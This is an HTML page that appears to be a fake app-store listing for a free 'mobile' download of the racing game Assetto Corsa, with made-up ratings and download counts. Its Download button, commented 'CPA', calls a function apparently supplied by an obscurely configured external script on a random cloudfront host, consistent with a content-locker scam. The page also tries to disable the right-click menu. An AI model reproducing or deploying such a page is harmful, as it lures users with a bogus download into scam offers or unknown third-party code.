<!DOCTYPE html>
<html>
<head>
	<title>Appstorm - Assetto Corsa</title>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.5/font/bootstrap-icons.css">

	<script type="text/javascript">
		var UEoto_JRS_xbrHbc={"it":4356828,"key":"14cfa"};
	</script>
	<script src="https://d17iy0164v753e.cloudfront.net/4d34daf.js"></script>
</head>
<body contextmenu="return false" >

<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;700&display=swap');

body {
  font-family: 'Poppins', sans-serif;
  background: #fff;
  justify-content: center;
}

.cr {margin-top:-15%;}
.cr .cover img {width:100%;background-cover:cover;background-position:centre;border-radius:10px;}
.cr .logo img {width:110px;height:110px;border:1px solid #ddd;margin-top:-30px;border-radius:5px;}
.cr .logo {display:flex;}
.cr .logo .info {padding:15px 0 0 15px;}
.det {display:flex;margin:20px 0;}
.det .item {width:100%;text-align:center;font-size:.9rem;}
.btn-down {all:unset;width:100%;background:#456FFF;border:none;color:#fff;padding:8px 0;border-radius:34px;margin:7px 0 20px 0;text-align:center;font-weight:500;}
.bad {display:flex;overflow:scroll;color:#666;}
.bad div {margin-right:10px;padding:4px 8px;border:1.3px solid #ccc;font-size:.8rem;white-space:nowrap;border-radius:5px;}
.v9 {background-image:url("https://www.incredibox.com/img/down-v9-artwork.jpg");padding:40px 0;background-position:center;background-size:cover;}

p {font-size:.85rem;color:#777;}
.logo h1 {font-size:1.7rem;}
h2 {font-size:1.4rem;}
h3 {font-size:1.25rem;}
h4 {color:#eee;font-size:1rem;margin-bottom:12px;}


footer {background:#252525;padding:30px 0;margin-top:40px;color:#a1a1a1;font-size:.9rem;}

.scrolling-wrapper {
padding:10px 0 20px 0;
  overflow-x: scroll;
  overflow-y: hidden;
  white-space: nowrap;
  -webkit-overflow-scrolling: touch;
  &::-webkit-scrollbar {
    display: none;
  }

  .card {
    display: inline-block;
  }
}

.scrolling-wrapper-flexbox {
  display: flex;
  flex-wrap: nowrap;
  overflow-x: auto;

  .card {
    flex: 0 0 auto;
  }
}
.scrolling-wrapper .card {
border:none;
padding:0 4px;
}
.scrolling-wrapper img {
height:150px;
width:100%;
background-position:center;
background-cover:cover;
object-fit:contain;
border-radius:10px;
}


</style>
<br><br>


<div class="cr" >
<div class="cover" ><img src="https://gaming-cdn.com/images/products/1263/orig/assetto-corsa-pc-game-steam-cover.jpg?v=1707830876" ></div>
	<div class="container-md" >
		<div class="logo" >
			<img src="https://image.api.playstation.com/cdn/EP4040/CUSA01797_00/NMcAucyANMnYMNkz6V5vk9f5YXty2mCz.png" >
			<div class="info" >
				<h1>Assetto Corsa</h1>
				<small>Mobile - Playground</small>
			</div>
		</div>
		<div class="det" >
			<div class="item" >
				<div class="icon" >4.5 <i class="bi bi-star" ></i></div>
				<div>450k reviews</div>
			</div>
			<div class="item" >
				<div class="icon" ><i class="bi bi-download" ></i></div>
				<div>865MB</div>
			</div>
			<div class="item" >
				<div class="icon" >+5M</div>
				<div>Downloads</div>
			</div>
		</div>
			<!-- CPA -->
			<button onclick="_Jl()" class="btn-down"   >Download</button>
	</div>

<div class="scrolling-wrapper">
	<div class="card"><img src="https://car-images.bauersecure.com/wp-images/3883/acc_054.jpg" ></div>
	<div class="card"><img src="https://images.kinguin.net/g/carousel-main-mobile/media/category/s/s/ss_4cd81f3df0d4378fb05fd95af49672d0d07c1070.1920x1080_1594836338_1_1.jpg" ></div>
	<div class="card"><img src="https://newsroom.porsche.com/.imaging/mte/porsche-templating-theme/image_1290x726/dam/pnr/porsche_newsroom/Motorsport/919-Hybrid-Rennsimulator-Assetto-Corsa/Screenshot_ks_porsche_919_hybrid_2016_monza_1-12-116-23-45-54.jpg0/jcr:content/Screenshot_ks_porsche_919_hybrid_2016_monza_1-12-116-23-45-54.jpg" ></div>
	<div class="card"><img src="https://www.gtplanet.net/wp-content/uploads/2016/08/Assetto_Corsa_Console_Release_18-638x359.jpg" ></div>
	<div class="card"><img src="https://www.overtake.gg/news/assetto-corsa-competizione-1-9-6-update-and-gt2-pack-all-you-need-to-know.1720/cover-image" ></div>
	<div class="card"><img src="https://www.fia.com/sites/default/files/news/main_image/esports_release_image.jpeg" ></div>
</div>
			
	<div class="container-md" >
		<h2>About this app</h2>
		<p>Assetto Corsa is a top-tier racing simulator offering unparalleled realism. Its advanced physics, stunning graphics, and extensive car collection set it apart. The game's immersive environment, dynamic lighting, and realistic materials create a truly authentic driving experience. Whether you prefer solo races or intense multiplayer competitions, Assetto Corsa delivers.</p>
		<div class="bad" >
			<div>Entertainment</div> 
			<div>Action</div>
			<div>Cars</div>
		</div>
		<br> 
		
			</div>
		
		<img src="https://i0.wp.com/www.handsomephantom.com/wp-content/uploads/2020/06/assetto1.jpg?resize=1170%2C658&ssl=1" class="w-100" >
		
		<div class="container-md" >
		<br>
			<h3>LEGENDARY TRACKS</h3>
			<p>The circuits have been developed using Laser scan technology, in order to guarantee the highest level of accuracy possible in reproducing real world motor racing environments.
				Monza, Silverstone, Imola, Mugello, Spa, Brands Hatch and many more tracks, including the historical reproduction of Monza, that brings again to life the legendary Sopraelevata, the high-speed oval where races were staged until 1961.</p>		
			<h3>EXCLUSIVE CARS</h3>
			<p>The Assetto Corsa physics engine is all new, using practical knowledge acquired from working closely with the elite of motorsport in order to engineer the best possible accuracy of physics and tactility of feeling.
				A physics engine like this begs to be used with officially licensed contents: Abarth, Audi, BMW, Classic Team Lotus, Ferrari, KTM, Lamborghini, Lotus cars, McLaren, Mercedes, Scuderia Glickenhaus, Pagani, Porsche, Tatuus and many more!</p>	
			<h3>HARDWARE COMPATIBILITY</h3>
			<p>Enjoy ASSETTO CORSA using any kind of game device: keyboard, joypad, joystick, steering wheels including any kind of professional device and the most common motion systems.
				ASSETTO CORSA is also compatible and ready for Oculus and OpenVR/VIVE, triple monitor view, Track IR and 3D VISION.</p>
			<h3>GAMEPLAY & FEATURES</h3>
			<p>Assetto Corsa includes a career mode, a list of special and unique events and challenges, as well as a fully customizable, single player and multiplayer modes featuring quick races, custom championships, race weekends including free practice session, qualifying session and race. Drag races, drift challenges and much more! Four driving assist profiles (gamer, racer, pro, plus a fully-customizable profile) allow any kind of player to enjoy the simulation at their desired level.</p>
			<h3>MODDING & CUSTOMIZATION</h3>
			<p>Assetto Corsa will allow for considerable customisation and modification, in order to satisfy the expectations of professional simracers, gamers who prefer to approach the driving experience more progressively, and hobbyists who just like to reproduce and share their cars and tracks, taking advantage of the same editing tools developed and used by the developers of the game.</p>
		</div>
			
			<footer>
		<div class="container-md" >
			<h4>Assetto Corsa</h4>
			<div class="row" >
				<div class="col-6" >
					<div class="mb-2" >About App</div>
					<div class="mb-2" >Assetto Corsa mobile</div>
					<div class="mb-2" >Free download</div>
				</div>
				<div class="col-6" >
					<div class="mb-2" >Help</div>
					<div class="mb-2" >News</div>
				</div>
			</div>
			<hr>
			<center>&copy; 2024 Appstorm EC Inc.</center>
			</div>
			</footer>
			
		</div>
		
	
		
</body>
</html>
